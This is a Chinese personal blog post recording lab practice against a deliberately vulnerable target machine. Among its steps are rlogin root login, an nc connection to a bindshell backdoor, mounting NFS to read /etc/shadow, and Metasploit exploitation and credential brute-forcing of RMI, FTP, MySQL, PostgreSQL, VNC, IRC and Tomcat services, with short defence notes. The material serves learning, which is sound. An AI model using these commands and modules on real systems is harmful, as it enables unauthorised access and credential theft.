<h2 id="rlogin最高权限登录"><a href="#rlogin最高权限登录" class="headerlink" title="rlogin最高权限登录"></a>rlogin最高权限登录</h2><p>一、rlogin介绍<br>远程登录(rlogin)是一个Unix命令，他允许授权用户进入网络中的其他Unix机器并且就像用户在现场操作一样。一旦进入主机，用户可以操作主机允许的任何事情。<br>使用nmap进行扫描，如果探测到<code>exec</code>和<code>login</code>两个服务，两个是rlogin的标配通常情况下在512和513端口开放这两个服务。<br>二、探测目标rlogin<br>使用<code>nmap -sV -p 512 513 IP地址</code>探测目标rlogin版本信息。<br>512用于对远程执行的进程进行验证、513反弹bash shell<br>三、rlogin最高权限登录<br>使用以下命令可以进行登录<br>rlogin -l root IP地址</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rlogin -l root 192.168.1.106</span><br></pre></td></tr></table></figure>
<p>输入<code>rlogin -h</code>查看帮助信息<br>然后就登录进入相对应的系统，并且身份是root<br>四、防御修复<br>1、添加root用户登陆验证密码<br>2、关闭rlogin服务，改用ssh等服务来管理服务器</p>
<h2 id="后门连接"><a href="#后门连接" class="headerlink" title="后门连接"></a>后门连接</h2><p>探测后门<br>某些情况下，服务器可能存在某些后门。可以使用nmap进行探测。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">探测开启服务</span></span><br><span class="line">nmap 192.168.40.147</span><br><span class="line"><span class="meta">#</span><span class="bash">如发现ingreslock服务开启，则进一步探测</span></span><br><span class="line">nmap -p 1524 -sV 192.168.40.147</span><br><span class="line"><span class="meta">#</span><span class="bash">发现是个绑定shell，service信息为bindshell</span></span><br><span class="line"><span class="meta">#</span><span class="bash">使用nc连接后门获取权限	nc [ip] [port]</span></span><br><span class="line">nc 192.168.40.147 1524</span><br><span class="line"><span class="meta">#</span><span class="bash">然后就可以连接成功使用终端命令行工具</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200722191748961.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>可以看到已经成功了，关于nc的使用，我也写过一篇介绍和简单的使用方法。有兴趣可以看下。<br>拓展：为什么会产生后门？<br>1.可能之前这个服务器已经经历过黑客攻击，并且留下了shell，我们就可以使用先前的现成的shell进行连接。<br>2.网站管理员在进行管理时，可能需要通过反弹shell进行，于是设置一个shell等待连接，期间我们也可以使用shell进行连接。<br>3.可能是某些软件本身就存在连接shell的后门</p>
<h2 id="NFS获取目标密码文件"><a href="#NFS获取目标密码文件" class="headerlink" title="NFS获取目标密码文件"></a>NFS获取目标密码文件</h2><h3 id="NFS介绍"><a href="#NFS介绍" class="headerlink" title="NFS介绍"></a>NFS介绍</h3><p>NSF(Network File System)即网络文件系统，是freeBSD支持的文件系统中的一种，它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件。<br>可以使用nmap查看目标IP地址是否开启了NFS服务。</p>
<h3 id="探测目标nfs"><a href="#探测目标nfs" class="headerlink" title="探测目标nfs"></a>探测目标nfs</h3><p>可以使用nmap</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap --script=nfs-* [ip]</span><br></pre></td></tr></table></figure>
<p>可以查看到相应的信息</p>
<h3 id="探测nfs是否可以导出"><a href="#探测nfs是否可以导出" class="headerlink" title="探测nfs是否可以导出"></a>探测nfs是否可以导出</h3><p>使用showmount命令确定“/”共享(文件系统的根)是否正在导出。可能需要安装nfs-common包才能使用<code>showmount</code>命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">apt-get install nfs-commmon</span><br><span class="line"><span class="meta">#</span><span class="bash">安装成功后，执行</span></span><br><span class="line">showmount -e [ip]</span><br><span class="line"><span class="meta">#</span><span class="bash">如果回显文件等信息了，则证明可以导出</span></span><br></pre></td></tr></table></figure>
<h3 id="查看导出内容"><a href="#查看导出内容" class="headerlink" title="查看导出内容"></a>查看导出内容</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mkdir nfs_root</span><br><span class="line">mount -t nfs [ip]:/~/nfs_root -o nolock#进行挂载，无加密</span><br><span class="line">cat ~/nfs_root/etc/shadow</span><br></pre></td></tr></table></figure>
<p>即可查看系统中所有文件。</p>
<h2 id="反序列化远程命令执行漏洞"><a href="#反序列化远程命令执行漏洞" class="headerlink" title="反序列化远程命令执行漏洞"></a>反序列化远程命令执行漏洞</h2><h3 id="Java-rmi介绍"><a href="#Java-rmi介绍" class="headerlink" title="Java rmi介绍"></a>Java rmi介绍</h3><p>Java rmi指的是远程方法调用。它是一种机制，能够让在某个Java虚拟机上的对象调用另一个Java虚拟机中的对象上的方法。<br>RMI是J2SE的一部分，能够让程序员开发出基于Java的分布式应用。一个RNI对象是一个远程Java对象。可以从另一个Java虚拟机上（甚至跨过网络）调用它的方法。可以像调用本地Java对象一样。<br>对于任何一个以对象为参数的RMI接口，你都可以发一个自己构建的对象。迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。<br>RMI的传输100%基于序列化。</p>
<h3 id="探测目标rmi"><a href="#探测目标rmi" class="headerlink" title="探测目标rmi"></a>探测目标rmi</h3><p>使用<code>nmap -p 1099 -sV [ip] </code>探测目标的版本信息。<br><img src="https://img-blog.csdnimg.cn/20200722185225990.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>服务是开启的，还能看到版本信息。</p>
<h3 id="rmi远程命令执行利用"><a href="#rmi远程命令执行利用" class="headerlink" title="rmi远程命令执行利用"></a>rmi远程命令执行利用</h3><p>利用metasploit进行漏洞利用<br>先打开metasploit，<br><img src="https://img-blog.csdnimg.cn/20200722185506112.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>使用<code>use exploit/multi/misc/java_rmi_server </code><br>然后进行配置参数<br><img src="https://img-blog.csdnimg.cn/20200722190621740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br><img src="https://img-blog.csdnimg.cn/20200722190713177.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>这样就基本差不多了，可以进行攻击了。</p>
<h3 id="进行漏洞攻击"><a href="#进行漏洞攻击" class="headerlink" title="进行漏洞攻击"></a>进行漏洞攻击</h3><p><img src="https://img-blog.csdnimg.cn/20200722190808522.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>显示session已经被创建了，所以直接利用就行了。<br><img src="https://img-blog.csdnimg.cn/20200722190926956.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>可以执行一些命令。<br>emmm，如果不知道可以执行哪些命令，就输入一个问号<code>?</code>回车查看。<br><img src="https://img-blog.csdnimg.cn/2020072219115458.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>这些都是可以执行的命令。</p>
<h2 id="proftpd测试"><a href="#proftpd测试" class="headerlink" title="proftpd测试"></a>proftpd测试</h2><h3 id="探测目标proftpd"><a href="#探测目标proftpd" class="headerlink" title="探测目标proftpd"></a>探测目标proftpd</h3><p>使用<code>nmap -sV -p 2121 192.168.40.147</code><br><img src="https://img-blog.csdnimg.cn/20200723105436960.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>探测出版本信息是<code>1.3.1</code></p>
<p>然后可以在searchsploit中寻找该版本的漏洞信息。<br><img src="https://img-blog.csdnimg.cn/20200723105613973.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>可以看出<code>1.3</code>的版本是有的，但是<code>1.3.1</code>额版本没有找到信息，我们可以直接暴力破解它的用户名和密码</p>
<h3 id="msf暴力破解密码"><a href="#msf暴力破解密码" class="headerlink" title="msf暴力破解密码"></a>msf暴力破解密码</h3><p>使用metasploit下的<code>auxiliary/scanner/ftp/ftp_login</code>进行目标探测。<br><img src="https://img-blog.csdnimg.cn/20200723105132283.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>设置参数，注意设置暴力破解的字典时，用户名和密码设置的是file类型的。然后运行就可以开始暴力破解。<br>由于知道靶机的用户名和密码，所以就直接使用正确的用户名和密码来测试。<br><img src="https://img-blog.csdnimg.cn/20200723110018680.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>成功的话，前面的标志就是绿色。</p>
<h2 id="mysql弱口令破解"><a href="#mysql弱口令破解" class="headerlink" title="mysql弱口令破解"></a>mysql弱口令破解</h2><p>版本信息的探测已经相对熟练了，还是用nmap进行探测3306端口（一般mysql服务都是在3306端口）<br>仍然使用metasploit进行暴力破解mysql的用户名和密码。<br>使用的模块是<code>auxiliary/scanner/mysql/mysql_login</code><br><img src="https://img-blog.csdnimg.cn/20200723111807416.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>可以看到这里是用户名为<code>root</code>密码为空成功登录<br>到这里就可以使用mysql登录了。<br><img src="https://img-blog.csdnimg.cn/20200723111922184.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>主要就是对metasploit的熟练使用。</p>
<h2 id="postgresql数据库密码破解"><a href="#postgresql数据库密码破解" class="headerlink" title="postgresql数据库密码破解"></a>postgresql数据库密码破解</h2><p>介绍不再多介绍，百度都有。<br>直接探测目标<code>postgresql</code><br>因为如果使用nmap进行初次大致扫描的话是可以直接扫出来有服务开启的，然后就可以知道是哪个端口上运行该服务，然后直接扫描相应的端口就行了。<br>这里已经扫出来该项服务运行在5432端口，所以一直姐扫描这个端口就可以知道它的版本信息等。<br>扫描对应的端口，上面那么多次扫描，已经可以熟练掌握，就不用再放图。<br>破解postgresql的用户名和密码仍然使用metasploit中的模块来进行破解。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/postgres/postgres_login</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200723114429511.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>破解出用户名和密码，下面可以利用它来登陆。<br>登陆postgresql可以使用一个第三方软件<code>pyadmin</code>来登陆postgresql进行查看信息。<br>没有下载这个软件，所以就没有操作。(这个软件是可以在windows系统中下载的，可以下载到物理机上面进行操作)</p>
<h3 id="postgresql代码执行利用"><a href="#postgresql代码执行利用" class="headerlink" title="postgresql代码执行利用"></a>postgresql代码执行利用</h3><p>利用msf下postgresql的代码执行获得反弹shell<br>利用的模块是<code>exploit/linux/postgres/postgres_payload</code><br>设置IP和端口，不过端口一般不用设置，默认设置好的。<br><img src="https://img-blog.csdnimg.cn/20200723133838716.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br><code>exploit</code>开始攻击。<br>输入<code>?</code>可查看可执行的命令，<br>会有一个反弹的shell，输入<code>shell</code>即可利用<br><img src="https://img-blog.csdnimg.cn/20200723134035188.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>但是得到的权限不是root权限，能执行的操作有限。</p>
<h3 id="防御和修复"><a href="#防御和修复" class="headerlink" title="防御和修复"></a>防御和修复</h3><p>防御：屏蔽任意IP连接postgresql</p>
<p>修复：升级版本，安全配置。</p>
<h2 id="VNC密码破解"><a href="#VNC密码破解" class="headerlink" title="VNC密码破解"></a>VNC密码破解</h2><h3 id="VNC简单介绍"><a href="#VNC简单介绍" class="headerlink" title="VNC简单介绍"></a>VNC简单介绍</h3><blockquote>
<p>VNC(Virtual Network<br>Console)是虚拟网络控制条的缩写。它是一款优秀的远程控制工具软件，由著名的AT&amp;T的欧洲研究实验室开发的。可视化控制，类似于远程桌面，默认VNC服务端运行在5900端口。</p>
</blockquote>
<p>可以使用nmap测试目标是否开启VNC服务。</p>
<h3 id="探测目标VNC"><a href="#探测目标VNC" class="headerlink" title="探测目标VNC"></a>探测目标VNC</h3><p>精致探测就直接探测具体端口，直接使用nmap。<br>查看版本信息和其他信息。</p>
<h3 id="msf破解VNC密码"><a href="#msf破解VNC密码" class="headerlink" title="msf破解VNC密码"></a>msf破解VNC密码</h3><p>依旧是利用metasploit的模块进行破解</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/vnc/vnc_login</span><br></pre></td></tr></table></figure>
<p>然后设置rhost，至于字典文件可以自己设置，也可以不设置。因为默认有一个字典。当然实际操作时，需要自己找字典。现在因为是靶机，就是用自带的字典就可以了。<br><img src="https://img-blog.csdnimg.cn/20200723135857586.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>用户名为空，密码为<code>password</code><br>所以就可以进行登录了。</p>
<h3 id="VNC客户端登录"><a href="#VNC客户端登录" class="headerlink" title="VNC客户端登录"></a>VNC客户端登录</h3><p>windows下安装<code>vnc viewer</code>客户端软件连接VNC服务端。<br>使用方法百度有，需要时再查。<br>呃呃呃至于防御，密码设置的难一点。再开监控（不会，以后再学）就OK了。</p>
<h2 id="irc后门利用"><a href="#irc后门利用" class="headerlink" title="irc后门利用"></a>irc后门利用</h2><p>前面的一些介绍省略。<br>默认情况下，irc运行在6667端口。<br>然后还是使用nmap进行探测版本号等信息。利用<code>searchsploit</code>搜索可以利用的poc。<br><img src="https://img-blog.csdnimg.cn/20200723141125198.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>看到了后门可以利用。<br>利用msf中使用irc后门连接的模块进行连接对应的shell。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/unix/irc/unreal_ircd_3281_backdoor</span><br></pre></td></tr></table></figure>
<p>直接设置rhost就可以开始攻击了。<br><img src="https://img-blog.csdnimg.cn/20200723141329368.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>而且可以看出，反弹的shell是root用户权限。可以执行任何操作。</p>
<h2 id="tomcat管理密码破解"><a href="#tomcat管理密码破解" class="headerlink" title="tomcat管理密码破解"></a>tomcat管理密码破解</h2><p>这个需要复制一下介绍，以前见过不过没了解，这次看一下。</p>
<blockquote>
<p>Tomcat服务器是一个免费的开源代码的web应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合普遍使用，是开发和调试jsp程序的首选。</p>
</blockquote>
<p>默认情况下，8180端口是tomcat管理的http端口。</p>
<h3 id="探测目标tomcat"><a href="#探测目标tomcat" class="headerlink" title="探测目标tomcat"></a>探测目标tomcat</h3><p><img src="https://img-blog.csdnimg.cn/20200723143948616.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>看出是Apache和jsp集成的服务。<br>还有版本信息等。<br>可以直接访问，看到这个界面<br><img src="https://img-blog.csdnimg.cn/20200723144132219.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>然后找管理，需要输入用户名和密码才能进行访问。<br><img src="https://img-blog.csdnimg.cn/20200723144152176.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"></p>
<h3 id="msf破解tomcat用户和密码"><a href="#msf破解tomcat用户和密码" class="headerlink" title="msf破解tomcat用户和密码"></a>msf破解tomcat用户和密码</h3><p>使用<code>auxiliary/scanner/http/tomcat_mgr_login</code>模块<br><img src="https://img-blog.csdnimg.cn/2020072314422173.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>所以用户名和密码都是tomcat<br>直接登录查看。<br><img src="https://img-blog.csdnimg.cn/20200723144411702.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"></p>
<h3 id="msf利用tomcat管理"><a href="#msf利用tomcat管理" class="headerlink" title="msf利用tomcat管理"></a>msf利用tomcat管理</h3><p>利用metasploit中的模块为<br><code>exploit/multi/http/tomcat_mgr_deploy</code><br>同样需要设置好参数，才能执行。</p>
<p><img src="https://img-blog.csdnimg.cn/20200723144955196.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>也可以利用反弹的shell获取用户权限。<br><img src="https://img-blog.csdnimg.cn/20200723145021120.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70" alt="m0re" loading="lazy"><br>不过可以看出这个并不是root用户权限。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>终于把这些基本的简单漏洞利用学的差不多了，这些主要是利用metasploit进行利用，也是对metasploit的练习，让更加了解和熟练使用metasploit。<br>这次学习到很多。</p>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me a candy.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164747m0re2020-08-07_00-47-30.jpg"><img loading="lazy" src="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164747m0re2020-08-07_00-47-30.jpg" alt="支付宝" title="支付宝"></a><div><span style="color:#00A3EE"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-alipay-line"></use></svg></span></div></div><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164656mm_reward_qrcode_1596729168536.png"><img loading="lazy" src="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164656mm_reward_qrcode_1596729168536.png" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>m0re</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://m0re.top/2020/08/23/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" title="漏洞利用">https://m0re.top/2020/08/23/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2020/08/23/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%90%84%E7%A7%8D%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F/" rel="prev" title="命令执行漏洞各种绕过方式"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">命令执行漏洞各种绕过方式</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2020/08/23/hello-world/" rel="next" title="Hello World"><span class="post-nav-text">Hello World</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div id="comment"><div class="comment-tooltip text-center"><span>尝试使用 utterances （基于 GitHub Issues）评论系统。</span><br><span>您可以点击下方按钮切换对应评论系统，</span><br><span><script>function showUtterances(){ document.querySelector(".utterances").style.display='block'; document.querySelector('#valine-container').style.display='none'; }function showValine(){ document.querySelector('#valine-container').style.display='block'; document.querySelector(".utterances").style.display='none'; }</script></span><br><span><a class="hty-button hty-button--raised" onclick="showValine()">Valine</a><a class="hty-button hty-button--raised" onclick="showUtterances()">utterances</a></span><br><span><style>.utterances{display:none;}</style></span><br></div><div id="valine-container"></div><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script>function initValine() {
  const valineConfig = {"enable":true,"appId":"gUEA9zKLhCnMFxQI5kI20WiD-gzGzoHsz","appKey":"GQKAp04LNloy3MrDMv86MI3i","placeholder":"评论一下~&nbsp_(:з」∠)_ （填写邮箱可以收到回复通知～）","avatar":null,"pageSize":10,"visitor":true,"highlight":true,"recordIP":true,"enableQQ":true,"requiredFields":["nick","mail"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = window.location.pathname
  new Valine(valineConfig)
}
setTimeout(initValine, 1000)</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="http://www.beian.miit.gov.cn" target="_blank">豫ICP备2020025591号-1</a></div><div class="copyright"><span>&copy; 2019 – 2020 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> m0re</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.1.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v0.9.7</span></div><div class="live_time"><span>本博客已苟延残喘了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  window.setTimeout(blog_live_time, 1000);
  const start = new Date('2020-02-21T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div></footer><a class="hty-icon-button" id="goUp" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="这里可以搜索本站内容~" value=""></div><div id="local-search-result"></div></div></div><script defer src="/js/utils.js"></script><script defer src="/js/hexo-theme-yun.js"></script></body></html>